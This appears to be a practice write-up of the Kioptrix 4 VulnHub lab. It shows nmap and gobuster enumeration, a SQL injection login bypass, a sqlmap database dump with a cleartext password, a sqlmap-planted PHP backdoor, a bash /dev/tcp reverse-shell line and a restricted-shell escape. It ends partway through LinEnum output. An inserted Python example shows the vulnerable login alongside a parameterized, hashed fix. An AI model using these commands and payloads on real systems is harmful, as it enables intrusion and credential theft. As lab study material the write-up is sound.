This is box 4/5 of the Kioptrix series, part of the series of box write-ups I am solving to practise for the OSCP. This level had some interesting challenges, such as heavy use of SQLMap, a legitimate SSH connection, a restricted shell bypass and plenty of enumeration.
So let's roll!
Machine Name: Kioptrix: Level 1.3 (#4)
Resource: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
Reconnaissance
This stage basically consisted of running nmap, which enumerated the services operating on the target.
The nmap flags used were -sS (SYN stealth scan), -sV (tries to identify the version of each service), -sC (runs the default NSE scripts), --mtu 152 (fragments the packets into 152-byte chunks) and -oA (saves the nmap output in normal, XML and grepable formats).
nmap -sS -sV -sC --mtu 152 -oA nmap_scan 172.16.0.100
Nmap scan report for 172.16.0.100
Host is up (0.0040s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:EE:A1:97 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -3h00m53s, deviation: 0s, median: -3h00m53s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2019-11-30T12:33:55-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 30 18:34:54 2019 -- 1 IP address (1 host up) scanned in 242.78 seconds
The services identified were SSH (22/TCP), HTTP (80/TCP) and Samba on ports 139/TCP and 445/TCP.
It was necessary to find out which operating system the target was running, to make sure this was not a false positive; for that nmap was run with the -O flag.
$ sudo nmap -O --mtu 152 -oA nmap_scan_OS_DISCOVERY 172.16.0.100
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-30 18:35 -02
Stats: 0:02:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.17% done; ETC: 18:38 (0:00:42 remaining)
Nmap scan report for 172.16.0.100
Host is up (0.0033s latency).
Not shown: 566 closed ports, 431 filtered ports
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:EE:A1:97 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.03 seconds
However, it was not possible to pin down the target's operating system beyond a generic Linux 2.6 kernel.
SMB
The SMB service was analysed with smbclient to identify the existing shares and, if possible, obtain access to information that would help compromise the target.
$ smbclient -L //172.16.0.100/ -U GUEST -W localdomain
WARNING: The "syslog" option is deprecated
Enter LOCALDOMAIN\GUEST's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
No exposed shares were found on SMB.
It was also checked whether the target had known SMB vulnerabilities, using nmap with its NSE scripts.
$ sudo nmap --mtu 152 -p 445 --script smb-vuln* -oA nmap_smb_vuln 172.16.0.100
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-30 18:38 -02
Nmap scan report for 172.16.0.100
Host is up (0.0092s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:EE:A1:97 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
One SMB flaw was identified, but it only affects the availability of the service, being a denial-of-service condition. Since a technique like that makes no sense in this scenario, it was disregarded.
HTTP
With the attack surface on the other services such as SMB being very restricted, enumeration of the web service began, using the GoBuster tool.
sudo docker run -v "/opt/SecLists/Discovery/Web-Content/:/wordlists" -v "$(pwd):/output" --rm devalias/gobuster -l -e -s 200,204,403 -u 'http://172.16.0.100/' -w /wordlists/big.txt -t 200 -x php,cnf,conf,js,asp,aspx -o /output/gobusterDir -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" -f
Gobuster v1.3 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://172.16.0.100/
[+] Threads : 200
[+] Wordlist : /wordlists/big.txt
[+] Output file : /output/gobusterDir
[+] Status codes : 200,204,403
[+] User Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[+] Show length : true
[+] Extensions : .php,.cnf,.conf,.js,.asp,.aspx
[+] Add Slash : true
[+] Expanded : true
=====================================================
http://172.16.0.100/.htpasswd/ (Status: 403) [Size: 329]
http://172.16.0.100/.htaccess/ (Status: 403) [Size: 329]
http://172.16.0.100/.htpasswd.php (Status: 403) [Size: 332]
http://172.16.0.100/.htaccess.php (Status: 403) [Size: 332]
http://172.16.0.100/.htpasswd.cnf (Status: 403) [Size: 332]
http://172.16.0.100/.htaccess.cnf (Status: 403) [Size: 332]
http://172.16.0.100/.htpasswd.conf (Status: 403) [Size: 333]
http://172.16.0.100/.htaccess.conf (Status: 403) [Size: 333]
http://172.16.0.100/.htaccess.js (Status: 403) [Size: 331]
http://172.16.0.100/.htpasswd.js (Status: 403) [Size: 331]
http://172.16.0.100/.htaccess.asp (Status: 403) [Size: 332]
http://172.16.0.100/.htpasswd.asp (Status: 403) [Size: 332]
http://172.16.0.100/.htaccess.aspx (Status: 403) [Size: 333]
http://172.16.0.100/.htpasswd.aspx (Status: 403) [Size: 333]
http://172.16.0.100/cgi-bin/ (Status: 403) [Size: 327]
http://172.16.0.100/cgi-bin// (Status: 403) [Size: 328]
http://172.16.0.100/doc/ (Status: 403) [Size: 323]
http://172.16.0.100/icons/ (Status: 200) [Size: 69404]
http://172.16.0.100/images/ (Status: 200) [Size: 931]
http://172.16.0.100/index/ (Status: 200) [Size: 1255]
http://172.16.0.100/index.php (Status: 200) [Size: 1255]
http://172.16.0.100/john/ (Status: 200) [Size: 912]
http://172.16.0.100/robert/ (Status: 200) [Size: 920]
http://172.16.0.100/server-status/ (Status: 403) [Size: 333]
=====================================================
The directory enumeration showed that user directories are exposed at the web root, namely john and robert.
http://172.16.0.100/john/ (Status: 200) [Size: 912]
http://172.16.0.100/robert/ (Status: 200) [Size: 920]
Accessing the robert and john directories results in a strange response from the application.
SQL injection tests against http://172.16.0.100/index.php indicate that the application is vulnerable: when a valid username is supplied, the password check fails with an error that shows the traceback. The payload consists of supplying a username that exists in the system and injecting SQL into the password field of the form.
Payload: username John, password = ' or 2=2# -> valid login, but it crashes
To automate verification of the SQL injection flaw, the SQLMap tool was used. SQLMap handles different SQL injection scenarios and checks, and has many features to support a SQL injection attack.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p myusername,mypassword --random-agent --tamper=space2comment --batch
SQLMap confirmed that the mypassword parameter is vulnerable to SQL injection, which may be the main attack vector for compromising this box.
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
Next, the databases on the MySQL instance were enumerated.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --dbs --batch --threads=10
available databases [3]:
[*] information_schema
[*] members
[*] mysql
With the database name members it was possible to enumerate its tables.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 -D members --tables
Database: members
[1 table]
+---------+
| members |
+---------+
With the table members in the members database identified, it was possible to enumerate the table's columns.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 -D members -T members
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
With the table definition known, the database could be dumped; two records were found, for the users John and Robert.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 -D members -T members --dump
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
John's credential is stored in cleartext and Robert's in base64.
After dumping the database, it was checked whether a shell on the operating system could be obtained through the database; the tests succeeded, allowing the attacker to gain operating system access via the SQL injection.
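The login flaw exploited above, and the fix a defender would apply, as an added example that is not part of the original write-up nor the VM's own checklogin.php. It assumes the members table layout dumped above (id, password, username), uses an in-memory sqlite3 copy with constructed rows, and writes the MySQL `#` comment from the payload as `-- ` because sqlite only accepts the SQL-standard comment.

```python
"""Vulnerable vs. hardened login for the 'members' table (constructed demo)."""
import hashlib
import hmac
import os
import sqlite3

# Constructed copy of the dumped table: id, password, username.
# John's password is cleartext and Robert's is the base64 value seen in the dump.
DUMPED_ROWS = [
    (1, "MyNameIsJohn", "john"),
    (2, "ADGAdsafdfwt4gadfga==", "robert"),
]

# The write-up's payloads, with MySQL's '#' comment rewritten as '-- ' for sqlite.
PAYLOADS = ["' or 2=2-- ", "-5094' OR 7832=7832-- "]


def make_db(rows=DUMPED_ROWS):
    """Build an in-memory copy of the members table as it was stored on the box."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER, password TEXT, username TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?, ?)", rows)
    return con


def login_vulnerable(con, myusername, mypassword):
    """Mirrors the classic pattern: form fields concatenated into the SQL string.
    With password "' or 2=2-- " the WHERE clause becomes
    username='john' AND password='' or 2=2 -- ' , which is true for every row."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (myusername, mypassword))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(con, myusername, mypassword):
    """Same query with bound parameters: the payload is compared as a literal
    string and never reaches the SQL parser, so the bypass returns no row."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    row = con.execute(sql, (myusername, mypassword)).fetchone()
    return row[0] if row else None


def hash_password(password, salt=None, iterations=100_000):
    """Salted PBKDF2-HMAC-SHA256; base64 or cleartext storage offers no protection."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(stored, candidate):
    """Constant-time comparison against the stored hash record."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_hardened_db():
    """Constructed hardened copy: only hashes are stored. Robert's real password is
    unknown from the dump, so a labelled placeholder is used for his row."""
    rows = [(1, hash_password("MyNameIsJohn"), "john"),
            (2, hash_password("constructed-placeholder"), "robert")]
    return make_db(rows)


def login_hardened(con, myusername, mypassword):
    """Parameterized lookup by username, then hash verification in application code."""
    row = con.execute("SELECT username, password FROM members WHERE username=?",
                      (myusername,)).fetchone()
    if row is None or not verify_password(row[1], mypassword):
        return None
    return row[0]


def probe(login_fn, con, username="john"):
    """Run each payload through a login function; returns the user each one logged in as."""
    return [login_fn(con, username, p) for p in PAYLOADS]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", probe(login_vulnerable, db))      # ['john', 'john']
    print("parameterized:", probe(login_parameterized, db))   # [None, None]
    print("hardened     :", probe(login_hardened, make_hardened_db()))  # [None, None]
```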
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 --os-shell
[*] starting @ 18:56:15 /2019-11-30/
[18:56:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205' from file '/opt/sqlmap/data/txt/user-agents.txt'
[18:56:16] [INFO] resuming back-end DBMS 'mysql'
[18:56:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=john&mypassword=-5094' OR 7832=7832#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)
Payload: myusername=john&mypassword=abc' OR SLEEP(5)#&Submit=Login
---
[18:56:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[18:56:16] [INFO] going to use a web backdoor for command prompt
[18:56:16] [INFO] fingerprinting the back-end DBMS operating system
[18:56:16] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[18:56:16] [INFO] retrieved the web server document root: '/var/www'
[18:56:16] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[18:56:16] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[18:56:16] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://172.16.0.100:80/tmpurgaq.php
[18:56:16] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[18:56:16] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] Y
[18:56:16] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://172.16.0.100:80/tmpbymrg.php
[18:56:16] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:
---
checklogin.php index.php logout.php tmpbymrg.php
database.sql john member.php tmpurgaq.php
images login_success.php robert
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
The user that owns the process is www-data (33). With that in mind, attempts to obtain a reverse connection were made, for better usability of the compromised system. On the attacker's machine, port 80 was put in LISTEN, waiting for a connection from the compromised host.
$ ifconfig wlp6s0 ; sudo nc -tlvvp 80
wlp6s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.0.24 netmask 255.255.255.0 broadcast 172.16.0.255
inet6 fe80::cb4e:c8b6:2d47:b8ac prefixlen 64 scopeid 0x20<link>
ether 28:56:5a:ff:4d:3f txqueuelen 1000 (Ethernet)
RX packets 2956240 bytes 792588715 (792.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4164081 bytes 523976557 (523.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Listening on [0.0.0.0] (family 0, port 80)
On the compromised host, the attempts to establish a reverse connection failed.
Reverse Shell FAIL:
os-shell> bash -i >& /dev/tcp/172.16.0.24/80 0>&1
Reverse Shell FAIL:
os-shell> echo "" > webshell.php
An attempt to identify why the reverse connection could not be established showed that the www-data (33) user has write limitations and other restrictions.
os-shell> touch a
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'touch: cannot touch `a': Permission denied'
Root directory, no permission to write
os-shell> ls -ld
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'drwxr-xr-x 5 root root 4096 Nov 30 12:55 .'
To get around SQLMap's limited shell, it was found that John's credential from the database is valid for SSH access.
operador@remember:/opt/sqlmap$ ssh john@172.16.0.100
The authenticity of host '172.16.0.100 (172.16.0.100)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.16.0.100' (RSA) to the list of known hosts.
john@172.16.0.100's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ echo $SHELL
*** forbidden path -> "/bin/kshell"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
As soon as the SSH connection is established, it is identified that a shell restriction known as kshell is in place; steps were taken to get around this restriction.
Restricted Shell Bypass
After reading some papers on how restricted shells work and how to bypass them, some tests were run against the target to jailbreak the restricted shell.
Several things were tried here following the guide, for example running a command directly via SSH and trying to escape the characters the shell blocks, but without success.
Available commands:
john:~$ help
cd clear echo exit help ll lpath ls
john:~$ echo $SHELL
*** forbidden path -> "/bin/kshell"
operador@remember:/opt/sqlmap$ ssh john@172.16.0.100 -t '/bin/bash'
john@172.16.0.100's password:
*** forbidden shell escape: "/bin/bash"
This incident has been reported.
$ ssh john@172.16.0.100 -t '/bin/sh'
john@172.16.0.100's password:
*** forbidden shell escape: "/bin/sh"
This incident has been reported.
Connection to 172.16.0.100 closed.
john:~$ ls -l \/
total 76
drwxr-xr-x 2 root root 4096 Feb 4 2012 bin
drwxr-xr-x 3 root root 4096 Feb 4 2012 boot
lrwxrwxrwx 1 root root 11 Feb 4 2012 cdrom -> media/cdrom
drwxr-xr-x 12 root root 13660 Nov 30 12:25 dev
drwxr-xr-x 67 root root 4096 Nov 30 12:25 etc
drwxr-xr-x 5 root root 4096 Feb 4 2012 home
drwxr-xr-x 2 root root 4096 Feb 4 2012 initrd
lrwxrwxrwx 1 root root 32 Feb 4 2012 initrd.img -> boot/initrd.img-2.6.24-24-server
drwxr-xr-x 13 root root 4096 Feb 4 2012 lib
drwx------ 2 root root 16384 Feb 4 2012 lost+found
drwxr-xr-x 4 root root 4096 Feb 4 2012 media
drwxr-xr-x 2 root root 4096 Jun 29 2009 mnt
drwxr-xr-x 2 root root 4096 Feb 4 2012 opt
dr-xr-xr-x 107 root root 0 Nov 30 12:25 proc
drwxr-xr-x 4 root root 4096 Feb 6 2012 root
drwxr-xr-x 2 root root 4096 Feb 4 2012 sbin
drwxr-xr-x 2 root root 4096 Feb 4 2012 srv
drwxr-xr-x 12 root root 0 Nov 30 12:25 sys
drwxrwxrwt 3 root root 4096 Nov 30 12:55 tmp
drwxr-xr-x 10 root root 4096 Feb 4 2012 usr
drwxr-xr-x 14 root root 4096 Feb 4 2012 var
lrwxrwxrwx 1 root root 29 Feb 4 2012 vmlinuz -> boot/vmlinuz-2.6.24-24-server
Some progress was made using escape characters, but not enough to achieve a bypass. In other papers I noticed that there is a behaviour of the shell where it is possible to open a shell using Python with the os module.
echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
And so we have our bypass of the restricted shell.
Post Exploitation
The privilege escalation process was complicated by several connectivity restrictions on the box: it could not reach the internal or the external network, only some ICMP packets went through.
The Linux Enumeration utility (LinEnum) was used to automate reconnaissance of the target system.
$ ./linenum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.93
[-] Debug Info
[+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
Scan started at:
Sat Nov 30 14:08:10 EST 2019
### SYSTEM ##############################################
[-] Kernel information:
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
[-] Kernel information (continued):
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
[-] Hostname:
Kioptrix4
### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(john) gid=1001(john) groups=1001(john)
[-] Users that have previously logged onto the system:
Username Port From Latest
loneferret tty1 Mon Feb 6 20:05:44 -0500 2012
john pts/0 172.16.0.24 Sat Nov 30 13:29:15 -0500 2019
[-] Who else is logged on:
14:08:10 up 1:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
john pts/0 172.16.0.24 13:29 3.00s 0.62s 0.00s /bin/bash ./linen
[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(mysql) gid=108(mysql) groups=108(mysql)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(loneferret) gid=1000(loneferret) groups=1000(loneferret),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),112(sambashare),114(lpadmin),115(admin)
uid=1001(john) gid=1001(john) groups=1001(john)
uid=1002(robert) gid=1002(robert) groups=1002(robert)
[-] It looks like we have some admin users:
uid=1000(loneferret) gid=1000(loneferret) groups=1000(loneferret),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),112(sambashare),114(lpadmin),115(admin)
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
[-] Super user account(s):
root
[+] We can sudo without supplying a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
{-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...
[-] Accounts that have recently used sudo:
/home/loneferret/.sudo_as_admin_successful
[+] We can read root's home directory!
total 44K
drwxr-xr-x 4 root root 4.0K Feb 6 2012 .
drwxr-xr-x 21 root root 4.0K Feb 6 2012 ..
-rw------- 1 root root 59 Feb 6 2012 .bash_history
-rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc
-rw-r--r-- 1 root root 1 Feb 5 2012 .lhistory
-rw------- 1 root root 1 Feb 5 2012 .mysql_history
-rw------- 1 root root 5 Feb 6 2012 .nano_history
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 2 root root 4.0K Feb 6 2012 .ssh
-rw-r--r-- 1 root root 625 Feb 6 2012 congrats.txt
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 lshell-0.9.12
[-] Are permissions on /home directories lax:
total 20K
drwxr-xr-x 5 root root 4.0K Feb 4 2012 .
drwxr-xr-x 21 root root 4.0K Feb 6 2012 ..
drwxr-xr-x 2 john john 4.0K Nov 30 14:07 john
drwxr-xr-x 2 loneferret loneferret 4.0K Feb 6 2012 loneferret
drwxr-xr-x 2 robert robert 4.0K Feb 4 2012 robert
[-] Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
[-] Environment information:
LC_PAPER=pt_BR.UTF-8
LC_ADDRESS=pt_BR.UTF-8
LC_MONETARY=pt_BR.UTF-8
SHELL=/bin/kshell
TERM=xterm
SSH_CLIENT=172.16.0.24 46824 22
LC_NUMERIC=pt_BR.UTF-8
SSH_TTY=/dev/pts/0
USER=john
LC_TELEPHONE=pt_BR.UTF-8
COLUMNS=82
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
MAIL=/var/mail/john
LC_IDENTIFICATION=pt_BR.UTF-8
PWD=/home/john
LANG=en_US.UTF-8
LC_MEASUREMENT=pt_BR.UTF-8
LINES=39
HISTCONTROL=ignoreboth
HOME=/home/john
SHLVL=3
LOGNAME=john
SSH_CONNECTION=172.16.0.24 46824 172.16.0.100 22
LESSOPEN=| /usr/bin/lesspipe %s
VIMRUNTIME=/usr/share/vim/vim71
VIM=/usr/share/vim
LESSCLOSE=/usr/bin/lesspipe %s %s
LC_NAME=pt_BR.UTF-8
_=/usr/bin/env
[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
[-] Current umask value:
u=rwx,g=rx,o=rx
0022
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 724 May 12 2009 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rw-r--r-- 1 root root 492 Apr 17 2009 php5
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 633 Jun 18 2009 apache2
-rwxr-xr-x 1 root root 8101 Apr 17 2009 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Oct 9 2008 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Mar 9 2009 samba
-rwxr-xr-x 1 root root 3295 May 12 2009 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
